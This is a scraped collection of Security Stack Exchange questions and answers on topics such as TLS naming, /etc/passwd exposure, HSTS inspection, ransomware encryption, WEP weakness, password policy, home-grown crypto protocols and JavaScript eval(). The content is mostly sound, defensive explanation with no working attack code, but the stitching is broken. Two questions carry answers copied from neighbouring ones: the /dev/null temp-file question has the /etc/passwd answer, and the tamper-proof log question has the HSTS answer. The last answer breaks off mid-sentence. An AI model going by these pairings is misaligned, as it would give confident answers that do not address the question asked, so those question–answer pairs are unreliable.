Since TLS is preferred over SSL, why do we still use the terms SSL and HTTPS generally? The former could be anecdotal, but most people I speak to still say SSL in general conversation. The term HTTPS is more objective, since that means HTTP over SSL. Why don't we say HTTPT (HTTP over TLS) and use the scheme httpt://?
Huge effort. Little technical return. Introducing a new scheme (schemes are e.g. http:// , https:// , ftp:// , etc.) and deploying it would mean breaking backwards compatibility. Not worth it. Political rather than technical Ivan Ristic devotes some sentences in the introduction to his book to this. The book is called Bulletproof SSL and TLS . You've got both the "SSL" and "TLS" right in the title. (Go figure.) The introductory chapter is free online . The naming controversy is mentioned in section "SSL versus TLS" (page xix) and section "Protocol History" (page 3). It seems the whole reason for renaming from SSL to TLS was political rather than technical. Ristic's footnotes link to the blog of Tim Dierks. Dierks wrote the SSL 3.0 reference implementation in 1996 and this is his take on the naming: Tim Dierks, 2014-05-23, Security Standards and Name Changes in the Browser Wars (archived here ): As a part of the horsetrading, we had to make some changes to SSL 3.0 (so it wouldn't look [like] the IETF was just rubberstamping Netscape's protocol), and we had to rename the protocol (for the same reason). And thus was born TLS 1.0 (which was really SSL 3.1). And of course, now, in retrospect, the whole thing looks silly. Further reading Here's another take on the naming. It's by Mike McCana (who operates a CA himself): Mike McCana, CertSimple.com blog, 2016-01-05, Why do we still say SSL? (Archived here .)
{ "source": [ "https://security.stackexchange.com/questions/92292", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79286/" ] }
92,538
I have a router and I'm the only user. I have a computer with Linux and a tablet with Windows 8.1. Because of a few problems, I had to reinstall Windows on the tablet. Since I'm a bit paranoid about virus and malware, I would like to ask: Even if I only used the Internet to download Windows updates and get the antivirus software from the official website (using IE), is it possible to get infected only by staying connected to the Internet (doing nothing else)? Also note that I never had both computer and tablet connected at the same time. I read somewhere that is possible to get the router infected, so to prevent this, I'm doing almost everything with attention.
A few years ago (2003), there was this worm called "Blaster" (or MSBlast, Lovesan etc. - read more on https://en.wikipedia.org/wiki/Blaster_(computer_worm) ). It spread by using a vulnerability in an RPC service, running on Windows XP and 2000. At the time where it was "worst", you could get infected within minutes, if you didn't have a firewall set up. I remember installing a clean Windows XP, putting it online (without a firewall), and watch it get infected within minutes. So to answer your question: Yes, if you're connected to the internet, you're vulnerable as long as there's open ports with services listening on them (and there's a vulnerability in the software). So you can definitely get infected by just being online and not doing anything. Remember, even if you're not doing anything, your computer is still connected to various services online and using the internet.
{ "source": [ "https://security.stackexchange.com/questions/92538", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79507/" ] }
92,721
I have heard that is better to never click to any link in an email. Is it a bad idea to click to a unsubscribe link? What is the best way to unsubscribe to undesired mails?
You should not click on any links. By clicking on the "unsubscribe" link you probably get marked as "Active Reader" which is willing to interact. You also get on the page of the sender, which might could infect you with malware. Remember: With clicking on any link you've confirmed to the sender that your email address is both valid and in active use. Just delete and ignore it. Your email then might get marked as "inactive".
{ "source": [ "https://security.stackexchange.com/questions/92721", "https://security.stackexchange.com", "https://security.stackexchange.com/users/54270/" ] }
92,766
On the exploit websites I see security analysts and hackers targeting the /etc/passwd file when showing the proof of concept. If you have a local file inclusion or path traversal vulnerability on your server, and hackers are able to access (view, read, but NOT edit) the /etc/passwd file, what are the repercussions of this? Aren't all passwords obfuscated in this file by design?
The only real repercussion is reconnaissance - the attacker can learn login names and gecos fields (which sometimes help guess passwords) from the /etc/passwd file. One reason for this is that, 20 years ago or so, most Unix variants shifted from keeping hashed passwords in the /etc/passwd file and moved them to /etc/shadow . The reason for this was that /etc/passwd needed to be world readable for tools like 'finger' and 'ident' to work. Once passwords were segregated into /etc/shadow , that file was made readable only by root. That said, /etc/passwd remains a popular 'flag' for security analysts and hackers because it's a traditional "hey, I got what I shouldn't" file. If you can read that, you can read other things under /etc as well, some of which can be useful to an attacker. But it's harder to test for (say) /etc/yum.conf if you don't know if yum's on the system; /etc/passwd is always there and is a reliable test of whether access worked. Put differently, the implicit repercussion of getting /etc/passwd is that the attacker has circumvented controls and can get arbitrary readable files, which means "I win!"* *No actual guarantee of win, express or implied
{ "source": [ "https://security.stackexchange.com/questions/92766", "https://security.stackexchange.com", "https://security.stackexchange.com/users/79804/" ] }
92,767
I am working on a web-service based crypto project in JAVA. The basic idea is for the client to send a SOAP request to a servlet to encrypt data. For data transmission I am using MIME/data-handlers and I noticed that MIME stores the data being transmitted in a temporary file if the size is larger then a given amount. Even though this file will be garbage collected I would prefer it to not even be on my system. Thus, I have been writing this temporary file to /dev/null. As this is just a project it is not the end of the world if someone could still read the temp file but it made me think about a production environment where this could be a huge issue. Is writing to /dev/null safe and secure? Is it the same as not writing the file at all? Could someone still access the plaintext temp file that is being written ie, as it is being written?
The only real repercussion is reconnaissance - the attacker can learn login names and gecos fields (which sometimes help guess passwords) from the /etc/passwd file. One reason for this is that, 20 years ago or so, most Unix variants shifted from keeping hashed passwords in the /etc/passwd file and moved them to /etc/shadow . The reason for this was that /etc/passwd needed to be world readable for tools like 'finger' and 'ident' to work. Once passwords were segregated into /etc/shadow , that file was made readable only by root. That said, /etc/passwd remains a popular 'flag' for security analysts and hackers because it's a traditional "hey, I got what I shouldn't" file. If you can read that, you can read other things under /etc as well, some of which can be useful to an attacker. But it's harder to test for (say) /etc/yum.conf if you don't know if yum's on the system; /etc/passwd is always there and is a reliable test of whether access worked. Put differently, the implicit repercussion of getting /etc/passwd is that the attacker has circumvented controls and can get arbitrary readable files, which means "I win!"* *No actual guarantee of win, express or implied
{ "source": [ "https://security.stackexchange.com/questions/92767", "https://security.stackexchange.com", "https://security.stackexchange.com/users/66321/" ] }
92,954
My question is about Firefox and Chrome. Is there a possibility to see which sites have set the HSTS flag in my browser?
Chrome : Open Chrome Type chrome://net-internals/#hsts in the address bar of chrome Query domain: if it appears as a result, it is HSTS-enabled Firefox : Open file explorer Copy and paste the following path into the address bar of your file explorer On Windows : %APPDATA%\Mozilla\Firefox\Profiles\ On Linux : ~/.mozilla/firefox On Mac : ~/Library/Application Support/Firefox/Profiles Double click the folder you see (if you have multiple Firefox profiles, there will be multiple folders) Open SiteSecurityServiceState.txt . This textfile contains sites that have enabled HSTS.
{ "source": [ "https://security.stackexchange.com/questions/92954", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70038/" ] }
92,955
I'm writing a .NET desktop application that is used to send orders to a server via a REST API. To avoid leaking of our authentication token I have made it so that, when used for the first time, the user has to submit the authentication token and a password to encrypt it with. The encryption algorithm is AES-256-CBC and the scheme is as follows: the password is hashed before it's used by the algorithm, the salt used for hashing is the computer GUID so just copying the program files will not suffice, and the IV is randomly generated and concatenated with the cipher. When the user opens the program thereafter, he or she is asked for a password, decryption is started, and when the authentication token does not match the required mask it will return an error. So far so good I'd say. However , my supervisor is not yet content with the level of security: he wants the program to log all orders that have been sent to the server in case of administrative anomalies by the third party that hosts the server, just so that we have a reference with a reasonable level of credibility (though I suppose you could just call it 'proof' in case their administration fails). The 'credibility' part is where any straightforward implementation of a logfile goes right out the window, it wouldn't provide: Integrity: No person (including the user) is allowed to modify the logfile with content that does not reflect actual usage of the program. The log can only be appended, only when the program's main function is used, and only by the program itself. Confidentiality: The contents of the log can only be summoned by the user of the program (the password prompt will aid in identification of the user). I've tried to come up with a cryptographic scheme (digital signing) encrypting every record that is appended to the log and encrypt the public key with the user's password, but this doesn't solve half the problem: the private key would have to be stored by the program anyhow, so strictly speaking it means the user has access to it and have the ability to modify the log. Is there a method or scheme that meets these requirements?
Chrome : Open Chrome Type chrome://net-internals/#hsts in the address bar of chrome Query domain: if it appears as a result, it is HSTS-enabled Firefox : Open file explorer Copy and paste the following path into the address bar of your file explorer On Windows : %APPDATA%\Mozilla\Firefox\Profiles\ On Linux : ~/.mozilla/firefox On Mac : ~/Library/Application Support/Firefox/Profiles Double click the folder you see (if you have multiple Firefox profiles, there will be multiple folders) Open SiteSecurityServiceState.txt . This textfile contains sites that have enabled HSTS.
{ "source": [ "https://security.stackexchange.com/questions/92955", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80138/" ] }
92,985
Why would anyone like Edward Snowden rely on 3rd party services like Lavabit or Hushmail to host his email? I mean it's very easy to set up a self-hosted email server. What you need: Rent VPS (even better: home server) & Domain (May take up to 2 days, who cares..) Set up Firewall (20 min) Secure SSH (10 min) Install and set up Postfix & Dovecot (1 hour) DKIM, SPF, DMARC, DNSSEC, DANE & co if you want. (1 hour - 2 hours) Secure everything again and test (30 minutes - 2 hours) Isn't such a setup "more secure" than relying on a 3rd party email service? Why do so many security experts (i.e. cryptologists & co.) not host their own email?
Rent VPS (even better: home server) & Domain (May take up to 2 days, who cares..) How many ISPs do not provide law enforcement access to their sites and to the systems they provide for their customers? And with a home server: lots of sites explicitly deny access to their mail server from a "home" IP address (these are known address blocks), in order to fight spam. And even if you manage this: are you home all day or are you sure to detect any kind of break-in? Please note that you are not up against the average burglar. Secure everything again and test (30 minutes - 2 hours) What you've described might help to protect your privacy against Google etc (at least the emails). Against the NSA it is probably not sufficient. If they really want to own you they can send clever phishing mails with malware, use malvertising to attack you, simply break into your home, and much more. Why do so many security experts (i.e. cryptologists & co.) not host their own email? Security is a very wide field and I'm sure lots of crypto experts probably have no idea of how to set up and properly secure a mail server. Also lots of mail administrators have no idea of deeper cryptography. They are all experts in their own field and they are not able to know everything. This means they either learn to be expert in another field and have less time for their own field, or they have to find a way to outsource such tasks to somebody they trust. DKIM, SPF, DMARC, DNSSEC, DANE & co if you want. (1 hour - 2 hours) These are definitely not easy. You have to find first somebody who lets you do DNSSec with your own domain. Most ISPs or even dedicated DNS providers don't. And to have DKIM, SPF, or DANE you either need to use your own DNS server with all the problems (need primary and secondary for availability etc) or have again to find a provider which lets you set all these records up. These short times you give are definitely not realistic for somebody who is doing this for the first time.
{ "source": [ "https://security.stackexchange.com/questions/92985", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80176/" ] }
93,014
My company has an ISO 27001 certification. They provided me a new laptop with Windows 8 OS in it. I asked if I can have a Linux/Ubuntu OS installed, they said that it is not possible due to the ISO 27001 standards. Is it true or do the technical people of the company not know how to install Linux/Ubuntu?
One of ISO 27001 requirements is management of access control to company's IT resources. If you just install Ubuntu on your laptop, all the access control will be managed by you directly, instead of your company. So when, for example, your manager will want to fire you, then your IT department won't be able to block your local laptop account in a convenient moment. Of course Linux can be connected to central authentication systems (AD, IPA, CAS etc.), but first your IT department needs to build required competences (a single employee knowing how to do that is not enough since all ISO standards require written, repeatable and verifiable processes). On the other hand, knowledge on how to connect Windows to AD, and deploy a central authentication, is more or less common in IT, so probably your company already has ISO processes for it. Therefore, they allow you to use only Windows.
{ "source": [ "https://security.stackexchange.com/questions/93014", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80194/" ] }
93,128
Encrypting a file to me is akin to dealing with a very long string, feeding it into the hashing or encryption function to get another long encrypted string (or a hash in the case of hashing). This process takes some good amount of time. I know that because I use HashTab to verify the integrity of the files I download off the Internet. How can ransomware like CTB-Locker or Crypt0l0cker encrypt their victims files instantly? Recently a friend of mine was a victim of one of these ransomware and he could NOT open his files/photos from Ubuntu on his dual-OS machine even when the infection happened with MSWindows. This suggests the encryption does not happen on the fly when you open a file.
I was at an OWASP talk where the speaker decompiled and analyzed a ransomware executable (for Windows) in front of us. There are many flavours of ransomware out there, so I can't speak to ransomware in general, but I can certainly talk about the one I saw. The general idea is that the ransomware executable contains the encryption public key needed to encrypt files using an asymmetric algorithm, for example RSA. The corresponding private / decryption key stays with the hackers so that no amount of reverse-engineering of the executable can give you the decryption key. To actually encrypt a file, it does something similar to: Skip the first 512 bytes of the file so that the file header stays intact. Encrypt the next 1 MB using the embedded encryption key. If the file is longer than this, leave the rest unencrypted. The point is not to fully hide or protect the data, it's enough to make it un-parseable. As for time, doing 1 MB of RSA is still slow and will still take several hours to crawl your HDD. I suspect that this specimen that I saw was just a lazy imitation of the full RSA-AES ransomware that Steffen Ullrich talked about in his answer - which is the one that you should really be worried about.
{ "source": [ "https://security.stackexchange.com/questions/93128", "https://security.stackexchange.com", "https://security.stackexchange.com/users/31356/" ] }
93,149
For some days, I was feeling that my Internet bill was booming. Then, I recently found out that a boy near my house was accessing my router to use the Internet. Then, I read some articles how to crack WEP security and found that it is way too easy to crack WEP. So I was looking for some ways to increase the security of an AP using the WEP protocol. But I didn't find anything. My router does not support WPA / WPA2 . So how can I make my router more secure, I mean uncrackable?
There is no method to make WEP uncrackable, or at least secure. So I suggest buying a new router that suports WPA2.
{ "source": [ "https://security.stackexchange.com/questions/93149", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78238/" ] }
93,162
How do I find out if a certificate is self-signed or authorized by CA? Somewhere I read that self-signed subject and issuer will be same, is it correct?
Yes it is true. When certificate is self-signed, then issuer and subject field contains the same value. Also, there will be only this one certificate in the certificate path.
{ "source": [ "https://security.stackexchange.com/questions/93162", "https://security.stackexchange.com", "https://security.stackexchange.com/users/64041/" ] }
93,322
I first thought all these terms were synonyms, but I sometimes see those terms used in the same document. For instance, on MSDN: data origin authentication, which enables the recipient to verify that messages have not been tampered with in transit (data integrity) and that they originate from the expected sender (authenticity). I don't completely understand how is integrity different from authenticity. How could it be possible to ensure only authenticity of the sender without data integrity? If an attacker is able to modify the content, how can we trust the sender field to be correct? Similarly, what does it mean to know that some data has integrity, but not knowing the sender? To me, it's just a matter of including or not the "Sender" field of the header in the part of the message that's checked for integrity (or authenticity, I'm confused now) As far as I know, digital signatures solve both integrity an authenticity, maybe that's why I can't see the difference between the two.
Integrity is about making sure that some piece of data has not been altered from some "reference version". Authenticity is a special case of integrity, where the "reference version" is defined as "whatever it was when it was under control of a specific entity". Authentication is about making sure that a given entity (with whom you are interacting) is who you believe it to be. In that sense, you get authenticity when integrity and authentication are joined together. If you prefer, authenticity is authentication applied to a piece of data through integrity. For instance, consider that you use your browser to connect to some https:// Web site. This means SSL. There is authentication during the initial handshake: the server sends its certificate and uses its private key, and the server's certificate contains the server's name; your browser checks that the server's name matches what was expected (the server name part in the URL). Then all the exchanged data is sent as "records" which are encrypted and protected against alteration: this is integrity . Since your browser receives data that is guaranteed unmodified from what it was when it was sent by a duly authenticated server, the data can be said to be "authentic". Don't overthink things. The terminology is at least half traditional, meaning that it is not necessarily practical. We like to talk about the triad "Confidentiality - Integrity - Authenticity" mostly because it makes the acronym "CIA", which looks cool.
{ "source": [ "https://security.stackexchange.com/questions/93322", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70088/" ] }
93,333
TLS stands for " transport layer security". And the list of IP protocol numbers includes "TLSP" as "Transport Layer Security Protocol". These two things would leave me to believe that TLS is a transport layer protocol. However, most people seem to talk about TLS over TCP. Wikipedia lists it as an "application layer" protocol. This is further complicated by the fact that TCP doesn't have anything like a protocol number: it just packages up raw bytes, so how do you parse out that you are getting a TLS packet, vs a packet that just starts with 0x14 - 0x18 or equivalent?
The OSI model , that categorizes communication protocols into successive layers, is just that: a model . It is an attempt at pushing a physical reality into neatly defined labelled boxes. Nobody ever guaranteed that it works... Historically, that model was built and published when the ISO was pushing for adoption of its own network protocols . They lost. The World, as a whole, preferred to use the much more simple TCP/IP . The "model" survived the death of its initial ecosystem, and many people have tried to apply it to TCP/IP. It is even commonly taught that way. However, the model does not match well TCP/IP. Some things don't fit in the layers, and SSL/TLS is one of them. If you look at the protocol details: SSL/TLS uses an underlying transport medium that provides a bidirectional stream of bytes. That would put it somewhere above layer 4. SSL/TLS organizes data as records, that may contain, in particular, handshake messages. Handshake messages look like layer 5. This would put SSL/TLS at layer 6 or 7. However, what SSL/TLS conveys is "application data", which is, in fact, a bidirectional stream of bytes. Applications that use SSL/TLS really use it as a transport protocol. They then use their own data representation and messages and semantics within that "application data". Therefore, SSL/TLS cannot be, in the OSI model, beyond layer 4. Thus, in the OSI model, SSL/TLS must be in layer 6 or 7, and, at the same time , in layer 4 or below. The conclusion is unescapable: the OSI model does not work with SSL/TLS. TLS is not in any layer. (This does not prevent some people from arbitrarily pushing TLS in a layer. Since it has no practical impact -- this is just a model -- you can conceptually declare that TLS is layer 2, 5, or 17; it won't be proven false.)
{ "source": [ "https://security.stackexchange.com/questions/93333", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80460/" ] }
93,395
I am migrating an old application which used MD5 hashing to Spring Security with BCrypt encoding of passwords. I want to encode the password on new user creation page, change password page and on login page before it is sent to the network. I know HTTPS can solve the problem, but I am still instructed to encode the password before sending it over network as per our organizational guidelines. What could be the best possible solution to do hashing of the passwords using JavaScript? Just to explain it further, I am using JCryption API for encrypting the password using AES, so the value transmitted over network is AES(SHA1(MD5(plain password))) now I want to replace MD5 with Bcrypt only. Rest of the things remain unchanged. Will this approach work against "Man in the middle attack" ?
I know HTTPS can solve the problem, but I am still instructed to encode the password before sending it over network as per our organizational guidelines. This really defines your situation. Basically, you have a simple solution that you should use anyway (use HTTPS), if only because without HTTPS an active attacker could hijack the connection after the authentication step, regardless of any "encoding" and hashing you use for the password (an attacker who is in position to do a Man-in-the-Middle attack will succeed regardless of how much you ritually dance with hash functions and encryption). Then, you also have a guideline that is both idiotic, and administratively unavoidable. Your problem is then: how can you do things properly, and still comply with the "guideline" ? Note that the guideline makes little sense at several levels. Not only does the lack of SSL makes the protocol vulnerable to hijack; but also any kind of "encoding" does nothing good against passive attackers either. The reason is that if the protocol is "the client shows the 'encoded' password" then a passive eavesdropper will simply look at that "encoded password" and send it himself -- thus, that kind of encoding does not actually improve security in any way. It just makes some people feel more secure because they understand cryptography as some kind of barbecue sauce ("the more we sprinkle everywhere the better it gets"). What I suggest is that you do the following: First, try to sell the idea that "HTTPS" incarnates the 'encoding'. In other words, by sending the password inside a SSL tunnel, you are already complying with the guideline, since the password is duly encoded (and, really, encrypted ), along with the rest of the data. If the stupidity infestation is more serious and some auditor (let's call him Bob) still throws a fit about your lack of "encoding" then try applying some reversible encoding on the client side. E.g. before sending the password, apply Base64 . This means that if the password is "bobsucks", what will be sent (within the SSL, of course) will be "Ym9ic3Vja3M=", and Bob will be happier, because the latter string is obviously a lot more secure. The important point here is that since the requirement does not make sense, the solution won't make much sense either.
{ "source": [ "https://security.stackexchange.com/questions/93395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77043/" ] }
93,399
A number of crypto-dongles make the claim that it is impossible to extract the stored private key once written. Yubico : The YubiKey AES Key information can never be extracted from a YubiKey device – only programmed to it. Nitrokey : Other than ordinary software solutions, the secret keys are always stored securely inside the Nitrokey. Their extraction is impossible which makes Nitrokey immune to computer viruses and Trojan horses. The claim as literally stated seems like marketing nonsense. The dongle itself has access to the private key so somehow it can be read. Still, it's an interesting claim. The choice of words -- "never", "always", "impossible" -- suggest that there is something that can be proven here. Or maybe I'm giving them too much credit. Is there anything to this? What is it? My guess is that they mean it's impossible to extract the private key without physically tampering with the crypto-dongle. It seems plausible that one could show that there simply is no physical channel for relaying the private key outside of the device. That complicates writing the key and I can't see how that could be solved. One way I could see is to not write the key verbatim but somehow allow it to be randomized, but I believe these devices actually allow writing the key. Or maybe there's more substance to it than that. For all I know theses devices uses some exotic mechanism for storing bits that really can't be read directly without destroying the device. I did find an answer here suggesting there is some real meat to this but it doesn't go into detail. https://security.stackexchange.com/a/92796/45880 Extracting private keys directly from the card is nearly impossible. With some acid package destruction and electron microscope work, a skilled team, and enough time, money, and luck you can in theory extract keys but it involves not only physical access but a scenario where the card will be physically destroyed.
Well "impossible" is impossible to prove which is why in the linked answer I said "almost impossible", maybe even that is overstating it. By using a secure hardware device the attack vector goes from "malware installed remotely on host steals secret," to "attacker needs to physically gain access to the hardware device and destructively remove the private key." The latter is certainly not impossible, but it is a lot more difficult. Those usb dongles work very similar to smartcards. I have more experience with smartcards so I will use that in the answer but most of the same principles apply. In fact many of those usb dongles use a smart card SoC internally. They are cheap, programmable, and offer robust security so in many applications it makes sense to just use a smartcard internally rather than try to build something new. A programmable smartcard is a complete computer in a single chip, or system on a chip (SoC). Now it is a very limited computer but still a computer. The connection to the "outside world" for the smartcard is a low privilege simple serial interface. The card gets a command (more like a request) from the host and the card responds with a response. The commands are limited to what the card has been programmed to do. So if we have a smart card programmed to digitally sign an instruction (like a payment request in credit card EMV), the host will send a request over the serial interface to the card consisting of a command and some inputs. The card parsed the command and assuming it is valid it sends back a digital signature to the host over the same interface. In many ways it resembles a client-server relationship with the smartcard being the server and the host system being the client. The private key never leaves the card during the process. It is just request in, response out. The host has no mechanism to force the smartcard to return the private key or do anything it wasn't programmed to do. Of course this assumes there is no "please give me all the private keys" command which would obviously be pointless and provide no security. The smartcard may have a user assigned PIN and the PIN is part of the command format. The smartcard verifies the PIN and if it is invalid will reject the command. It has its own internal memory so it may record internally the number of invalid attempts and be programmed to shutdown (or in extreme cases erase the card). The programming (flashing) of a smartcard is done prior to shipping. Of course if an attacker could just reprogram the smartcard to run a "give me all your keys" program it wouldn't be secure so most cards employ some sort of security bit in write once memory. So the card is programmed and the write bit set. The card will then reject any future attempts to reprogram. Try not to get hung up on a smartcard doing exactly this. They are programmable devices so they will vary in implementation but the general concept is you have this self contained computer with its own internal secure storage which has been programmed to respond to requests from a host over a simple low permission interface. I do agree the word "impossible" is marketing but it isn't that far from the truth. You could say practically impossible. The very basic design and locked functionality means you end up with a hardened device that is difficult to attack. However the old axiom " there is no information security without physical security " still applies. The private key is still physically in the smartcard. With physical access and enough motivation you can do pretty much "unsecret" any secret. As in the linked example the smartcard can be bypassed and the key read out directly off the physical memory. A common method is to take the card, remove the SoC and use acid deconstruction to burn away package. Using an electron microscope and enough skill you could locate the spot on the silicon which stores the keys, connect leads and read them out. It has been done so it definitely is not impossible but in most cases that isn't the type of attack or attacker we are trying to defend against. Honestly if your attacker would go to that level I would be more worried about a $5 wrench .
{ "source": [ "https://security.stackexchange.com/questions/93399", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45880/" ] }
93,611
TLDR: We already require two-factor authentication for some users. I'm hashing, salting, and doing things to encourage long passphrases. I'm not interested in the merits of password complexity rules in general. Some of this is required by law, and some of it is required by the customer. My question is fairly narrow: Should I detect leetspeak passwords such as Tr0ub4dor&3 as being a dictionary word, and therefore fail passwords that primarily consist of a single dictionary word (even if leeted). Multiple word passphrases are always accepted regardless if leeted or not, this is only a question about those who choose to use more traditional short passwords. I am the lead developer for an upcoming government website which will expose sensitive personal information (criminal history, SSNs , etc. primarily). The website will be consumed by the general public, for doing background checks on employees, etc. On the backend, I'm storing the passwords hashed with PBKDF2 salted on a per-user basis with very high iterations, so brute force hashing attacks against stronger passwords are not realistic (currently), and the website locks the user out for 10 min after five bad tries, so you can't brute force really that way either. I'm getting some pushback from my customers/partners about the severity of the password rules I have implemented. Obviously I want people to use 16-20+ char passphrases, but this is a slow-moving bureaucracy. So in addition to allowing/encouraging those good passwords, I have to allow some shorter "hard" passwords. I'm just trying to limit our exposure. In particular, the "no dictionary word" requirement is causing people frustration, as I disallow the classic leetspeak passwords such as XKCD's famous Tr0ub4dor&3 . (For those curious, I run the proposed password through a leetspeak permutation translator (including dropping the char) and then compare each permutation against a dictionary) Am I being too severe? I am a big proponent of "Avids rule of usability" - Security at the expense of usability comes at the expense of security. But in this case, I think it's more an issue of habit/education. I allow diceware/readable passphrase passwords with no restrictions, only the "normal" passwords get stronger requirements. XKCD #936: Short complex password, or long dictionary passphrase? Should I try to solve this with just better UI help? Should I stick to my guns? The multiple recent high-profile hacks, especially ones that exposed passwords makes me think I'm in the right, but I also don't want to make things stupid for no reason. Since I'm protected from brute force attacks fairly well (I think/hope), is this unnecessary complexity? Or just good defense in depth? For those that can't grok passphrases or truly random passwords, the "two words plus num/symbols" passwords seem to be both easy enough, and at least harder to hack, if I can get people to read the instructions... Ideas: Better password hints/displayed more prominently (too subjective?) Better strength meter (something based on zxcvbn? - would fail the dictionary words on the client-side rather than after a submit) Disallow all "short" passwords, force people to use only passphrases, which makes the rules simpler? "make me a password" button that generates a passphrase for them and makes them copy it into the password fields Give up and let the leetspeek passwords through? Heres what I currently have in my password instructions/rules: 16 characters or longer passphrase (unlimited max) or At least eight characters Contain three of the following UPPERCASE lowercase Numbers 0123456789 Symbols !@#$%^&*()_-+=,./<>?;:'" Not based on a dictionary word Not your username Examples of passwords that won't be accepted Troubador (Single dictionary word) Troubador&3 (Single dictionary word plus numbers and symbols) Tr0ub4dor&3 (Based on a single dictionary word) 12345678 (Does not contain 3/4 character types) abcdefgh (Does not contain 3/4 character types) ABCDEFGH (Does not contain 3/4 character types) ABCdefgh (Does not contain 3/4 character types) ABC@#$%! (Does not contain 3/4 character types) ab12CD (Too Short) Examples of passwords that will be accepted (do not use any of these passwords): correct horse battery staple (Diceware password) should floating things fashion the mandate (Readable passphrase - link to makemeapassword.org) GoodPassword4! (multiple words, upper, lower, numbers, symbols) Yyqlzka6IAGMyoZPAGpP (random string using uppercase, lowercase, and numbers)
The mistake here would be to believe that extra password rules increase security. They do not. They increase user annoyance; and they make users choose passwords that are harder to memorize. For some weird psychological reason, most people believe that a password with non-letter symbols is "more secure" in some ontological way than a password with only letters. However, this is fully unsubstantiated. There is one "password rule" that is not harmful to security: a minimum password length. This is because of the combination of two things: The most stupid brute force attacks enumerate all sequences of symbols, starting with sequences of 1, then 2, and so on. In that sense, a password that contains only 4 symbols can be said to be irremediably weak. Users understand that notion of enumerating all small passwords. They are ready to accept that they need to type at least 6 or 7 letters. All the other rules will be, at best, neutral, but most of them will in fact decrease security, because they will induce users to: design and share with each other "methods" for generating passwords that your server will accept, methods which usually have a lot of punctuation characters but very little entropy; write down their passwords, which are hard to memorize; reuse passwords on other systems, for the same reason of difficult memorization. "Password strength meters" are also harmful, because: They are not, and cannot be, reliable. A password strength meter only measures how long a given password would stand against the exact brute force strategy incarnated by the meter code, but no attacker is constrained to follow the exact same strategy. Password strength meters cannot measure the entropy that prevailed in the password selection, since they only see the result (the password itself). They turn password selection into a game that encourages witty strategies on the part of the user, and wit is exactly what we do not want for passwords. Secure passwords strive on randomness . What can help a lot is to provide a password generation system. Take care to make that system optional : you want users to willingly use it, not to force it upon them, lest they would rebel (and write down passwords, and share, and reuse). So my recommendation would be: Reject passwords shorter than 7 characters (since you have a mitigation system against online attacks -- namely the autolock for 10 minutes after 5 wrong tries -- you can tolerate relatively short passwords). BUT NO OTHER RULE. Any sequence of 7 or more characters is fine. Provide one or, even better, several optional password generation mechanisms, e.g. diceware, the "correct horse" thing, and so on. Encourage the use of password managers. If possible, try to find something else than passwords for authenticating users. My assertion is that you are pushing things in a somewhat skewed direction, not exactly the right one. In particular, password rules that insist on some specific characters are a bad thing (a common thing, but a bad thing nonetheless).
{ "source": [ "https://security.stackexchange.com/questions/93611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69109/" ] }
93,884
The team of developers I am part of is trying to develop a safe way to exchange sensitive data between a server and mobile devices. We have come up with the following algorithm: Device generates private RSA key, and sends the public key to server. Server generates unique to user AES key and uses the RSA public key to encrypt it and send it back to device. Device gets the AES key. Uses it to encrypt password and username and sends it to the server. Server decrypts the username and password. If there is a match, the AES key is used for secure communication for X amount of time or until log-out. Else, the process must be restarted. Is it safe enough? Are there ways it can be improved? What are the faults? Edit: After reading the comments, what is a safer alternative and why? Edit2: Ok, i get it. I won't use my own implementation, will find something already tried and proven.
All of the weaknesses in your protocol can be summed up as "use SSL" or even "use SSL, dammit !". In more details: All the protocol is of course vulnerable to impersonation, specifically the double impersonation that is also known as Man-in-the-Middle attack . Similarly, if any of potential attackers that can eavesdrop on the line decides to do a modification of the data in transit, then he can, and your client and server will be none the wiser. Experience shows that saying "encrypt all the data with that key" and then doing it correctly is awfully complex. SSL itself took almost 15 years to do that, and many implementations are still not up to it. Padding oracles, predictable IV, MAC verification timing, verified closure, protection against resequencing and replay of packets... As an overall assessment: don't do that.
{ "source": [ "https://security.stackexchange.com/questions/93884", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80961/" ] }
93,912
I introduced recaptcha to the login screen of a system. My goal was all about security things like dictionary/bots attacks or other thing of that type. The users now hate it, Some did not even understand it and I had to remove it. When I look around, I don't see many systems with that on the login screen, most of the times on other forms like contact us or sometimes like in stack exchange when you want to post. It made me wonder is it a good idea to have it on the login screen?
The way I've seen some large systems do it is to only require a captcha after sequential failed login attempts (ie: reset the count after a valid login). If you are worried about automated cracking, you could put the captcha at some high number of failures like 20, 50, 100 failed attempts. Almost no legitimate user will see the captcha, but an automated attack will get hit by it. Is it worth it to add this complexity? Security and UX are trade-offs. You need to find the correct trade-off for your risk profile.
{ "source": [ "https://security.stackexchange.com/questions/93912", "https://security.stackexchange.com", "https://security.stackexchange.com/users/54163/" ] }
94,017
Every time that someone mentions eval(), everyone says that there are "security issues" with it, but nobody ever goes into detail about what they are. Most modern browsers seem to be able to debug eval() just as well as normal code, and people's claims of a performance decrease are dubious/browser dependent. So, what are the issues, if any, associated with eval()? I haven't been able to come up with anything that could be exploited with eval() in JavaScript. (I do see issues with eval()'ing code on the server, but client-side eval() seems to be safe.)
eval() executes a string of characters as code. You use eval() precisely because the string contents are not known in advance, or even generated server-side; basically, you need eval() because the JavaScript itself will generate the string from data which is available only dynamically, in the client. Thus, eval() makes sense in situations where the JavaScript code will generate code. This is not intrinsically evil , but it is hard to do securely. Programming languages are designed to allow a human being to write instructions that a computer understands; to that effect, any language is full of small quirks and special behaviours that are supposed to help the human programmer (e.g. the automatic adding of ';' at the end of some statements in JavaScript). This is all nice and dandy for "normal" programming; but when you generate code from another program, based on data which may be potentially hostile (e.g. string excerpt from other site users), then you have to, as the developer for the code generator, know about all these quirks, and prevent hostile data to exploit them in damaging ways. In that sense, code generators (and thus eval() ) incur the same conceptual issues as raw SQL and its consequence, SQL injection attacks . Assembling at runtime an SQL request from externally provided parameters can be done securely, but this requires minding an awful lot of details, so the usual advice is not to do that. This relates to the usual conundrum of security, i.e. that it is not testable: you can test whether some 